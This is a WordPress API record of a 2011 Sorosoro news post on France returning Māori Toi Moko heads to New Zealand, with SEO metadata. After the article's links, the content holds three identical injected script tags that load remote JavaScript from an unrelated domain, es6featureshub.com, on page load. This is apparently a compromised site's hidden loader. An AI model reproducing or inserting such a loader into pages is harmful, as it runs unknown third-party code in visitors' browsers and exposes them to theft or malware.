{"id":59203,"date":"2011-10-13T22:40:58","date_gmt":"2011-10-13T20:40:58","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=59203"},"modified":"2025-10-21T22:19:11","modified_gmt":"2025-10-21T20:19:11","slug":"october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/","title":{"rendered":"October 3, 2011: France to return all M\u0101ori heads to New Zealand in January 2012"},"content":{"rendered":"<p style=\"text-align: justify;\">The news came across from St\u00e9phane Martin, the president of the <strong>Mus\u00e9e du quai Branly<\/strong> in Paris: all the <strong>M\u0101ori warrior heads<\/strong> \u2013 also known as <em>Toi Moko<\/em> \u2013 that remain in various French museums will be returned with a formal ceremony held at quai Branly at the end of the <a href=\"https:\/\/www.sorosoro.org\/en\/october-4-2011-january-22-2012-maori-exhibition-at-musee-du-quai-branly-paris\"><strong>M\u0101ori exhibition<\/strong><\/a>, end of January.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">The warrior heads used to be considered as trophies or curiosities, and they\u2019d been objects of trade and even manhunts when the colonization of Oceania began in the 18th century. Banned in 1831 by the British government in New Zealand and Australia, the trade continued illegally for years on end.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-59053 aligncenter\" title=\"Toi Moko \u00a9 Reuteurs\" src=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/tete-maori2.jpg\" alt=\"tete-maori2\" width=\"276\" height=\"190\" \/><\/p>\n<p style=\"text-align: justify;\"><strong>Restitution of all the Toi Moko stored in French museums was agreed in Parliament in May 2010<\/strong>. But France isn\u2019t the first country to make that decision: several countries, including Switzerland, Great Britain, Denmark, the Netherlands, and Germany had already agreed to New Zealand\u2019s request of having the remains returned.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">Still, last May, the city of Rouen was the first in France to solemnly return a mummified and tattooed M\u0101ori warrior head that had been offered to the local museum at the end of the 19th century.<\/p>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-59168 \" title=\"Maori Warrior\" src=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/tete-maori3.jpg\" alt=\"tete-maori3\" width=\"236\" height=\"245\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-59169 \" title=\"Major General Horatio Gordon Robley with his collection of Maori heads, an illustration from Medicine Man: The Forgotten Museum of Henry Wellcome, British Museum Press, 2003.\" src=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/tete-maori4.jpg\" alt=\"tete-maori4\" width=\"276\" height=\"245\" \/><\/p>\n<p style=\"text-align: justify;\">There should remain about twenty on the French territory at this point, including 7 at the Mus\u00e9e du quai Branly. They will soon be returned to the <strong>Museum of Te Papa<\/strong>, Wellington, where research will be carried out to determine which tribe the warriors belonged to.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">As for what is to become of the Toi Moko, discussion remains: some among the M\u0101ori wish to buy them in their home tribe, while others advocate to have them secured from destruction in the name of memory and a better knowledge of their culture.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><a href=\"http:\/\/www.stuff.co.nz\/dominion-post\/news\/5735347\/Te-Papa-to-get-20-more-toi-moko\" target=\"_blank\">Article in <em>The <\/em><em>Dominion Post<\/em><\/a><\/p>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/next.liberation.fr\/arts\/01012363653-les-tetes-maori-rendues-a-la-nouvelle-zelande-fin-janvier\" target=\"_blank\">Article in <em>Lib\u00e9ration<\/em> (in French)<\/a><\/p>\n<p style=\"text-align: justify;\">Articles and videos, May 2011:<\/p>\n<p style=\"text-align: justify; padding-left: 30px;\"><em><a href=\"http:\/\/www.guardian.co.uk\/culture\/2010\/may\/04\/maori-heads-france-new-zealand\" target=\"_blank\">The Guardian<\/a><\/em>, <em><a href=\"http:\/\/news.bbc.co.uk\/2\/hi\/8661231.stm\" target=\"_blank\">BBC<\/a><\/em>, <a href=\"http:\/\/news.bbc.co.uk\/2\/hi\/8661231.stm\" target=\"_blank\"><em> <\/em><\/a><em><a href=\"http:\/\/www.liberation.fr\/culture\/01012336306-rouen-restitue-une-tete-maorie\" target=\"_blank\">Lib\u00e9ration<\/a><\/em><a href=\"http:\/\/www.liberation.fr\/culture\/01012336306-rouen-restitue-une-tete-maorie\" target=\"_blank\"> (in French)<\/a><\/p>\n<p style=\"text-align: justify; padding-left: 30px;\"><a href=\"http:\/\/www.youtube.com\/watch?v=uM6MzYxsAwk\" target=\"_blank\">Interview of French senator Catherine Morin-Desailly (in French)<\/a><\/p>\n<p style=\"padding-left: 30px;\"><a href=\"http:\/\/tvnz.co.nz\/national-news\/maori-toi-moko-returns-nz-france-4162609\/video\" target=\"_blank\"><em> <\/em><\/a><em><a href=\"http:\/\/tvnz.co.nz\/national-news\/maori-toi-moko-returns-nz-france-4162609\/video\" target=\"_blank\"><em>One News <\/em> <\/a><\/em><a href=\"http:\/\/tvnz.co.nz\/national-news\/maori-toi-moko-returns-nz-france-4162609\/video\" target=\"_blank\">report<\/a><\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/www.sorosoro.org\/en\/october-4-2011-january-22-2012-maori-exhibition-at-musee-du-quai-branly-paris\">Article on the M\u0101ori exhibition held at Mus\u00e9e du quai Branly<\/a><\/p>\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>The news came across from St\u00e9phane Martin, the president of the Mus\u00e9e du quai Branly in Paris: all the M\u0101ori warrior heads \u2013 also known as Toi Moko \u2013 that remain in various French museums will be returned with a formal ceremony held at quai Branly at the end of the M\u0101ori exhibition, end of [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-59203","post","type-post","status-publish","format-standard","hentry","category-news"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>October 3, 2011: France to return all M\u0101ori heads to New Zealand in January 2012 - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"October 3, 2011: France to return all M\u0101ori heads to New Zealand in January 2012 - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"The news came across from St\u00e9phane Martin, the president of the Mus\u00e9e du quai Branly in Paris: all the M\u0101ori warrior heads \u2013 also known as Toi Moko \u2013 that remain in various French museums will be returned with a formal ceremony held at quai Branly at the end of the M\u0101ori exhibition, end of [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-10-13T20:40:58+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T20:19:11+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/tete-maori2.jpg\" \/>\n<meta name=\"author\" content=\"Michel.Lemee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Michel.Lemee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/\"},\"author\":{\"name\":\"Michel.Lemee\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"headline\":\"October 3, 2011: France to return all M\u0101ori heads to New Zealand in January 2012\",\"datePublished\":\"2011-10-13T20:40:58+00:00\",\"dateModified\":\"2025-10-21T20:19:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/\"},\"wordCount\":348,\"image\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/tete-maori2.jpg\",\"articleSection\":[\"News of the endangered languages\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/\",\"url\":\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/\",\"name\":\"October 3, 2011: France to return all M\u0101ori heads to New Zealand in January 2012 - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/tete-maori2.jpg\",\"datePublished\":\"2011-10-13T20:40:58+00:00\",\"dateModified\":\"2025-10-21T20:19:11+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#primaryimage\",\"url\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/tete-maori2.jpg\",\"contentUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/tete-maori2.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"October 3, 2011: France to return all M\u0101ori heads to New Zealand in January 2012\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/en\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/en\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/en\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\",\"name\":\"Michel.Lemee\",\"url\":\"https:\/\/www.sorosoro.org\/en\/author\/michel-lemee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"October 3, 2011: France to return all M\u0101ori heads to New Zealand in January 2012 - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/","og_locale":"en_US","og_type":"article","og_title":"October 3, 2011: France to return all M\u0101ori heads to New Zealand in January 2012 - Sorosoro","og_description":"The news came across from St\u00e9phane Martin, the president of the Mus\u00e9e du quai Branly in Paris: all the M\u0101ori warrior heads \u2013 also known as Toi Moko \u2013 that remain in various French museums will be returned with a formal ceremony held at quai Branly at the end of the M\u0101ori exhibition, end of [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/","og_site_name":"Sorosoro","article_published_time":"2011-10-13T20:40:58+00:00","article_modified_time":"2025-10-21T20:19:11+00:00","og_image":[{"url":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/tete-maori2.jpg","type":"","width":"","height":""}],"author":"Michel.Lemee","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Michel.Lemee","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/"},"author":{"name":"Michel.Lemee","@id":"https:\/\/www.sorosoro.org\/en\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"headline":"October 3, 2011: France to return all M\u0101ori heads to New Zealand in January 2012","datePublished":"2011-10-13T20:40:58+00:00","dateModified":"2025-10-21T20:19:11+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/"},"wordCount":348,"image":{"@id":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/tete-maori2.jpg","articleSection":["News of the endangered languages"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/","url":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/","name":"October 3, 2011: France to return all M\u0101ori heads to New Zealand in January 2012 - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#primaryimage"},"image":{"@id":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/tete-maori2.jpg","datePublished":"2011-10-13T20:40:58+00:00","dateModified":"2025-10-21T20:19:11+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/en\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#primaryimage","url":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/tete-maori2.jpg","contentUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/tete-maori2.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/en\/2011\/10\/october-3-2011-france-to-return-all-maori-heads-to-new-zealand-in-january-2012\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/en\/"},{"@type":"ListItem","position":2,"name":"October 3, 2011: France to return all M\u0101ori heads to New Zealand in January 2012"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/en\/#website","url":"https:\/\/www.sorosoro.org\/en\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/en\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18","name":"Michel.Lemee","url":"https:\/\/www.sorosoro.org\/en\/author\/michel-lemee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/posts\/59203","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/comments?post=59203"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/posts\/59203\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/media?parent=59203"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/categories?post=59203"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/en\/wp-json\/wp\/v2\/tags?post=59203"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}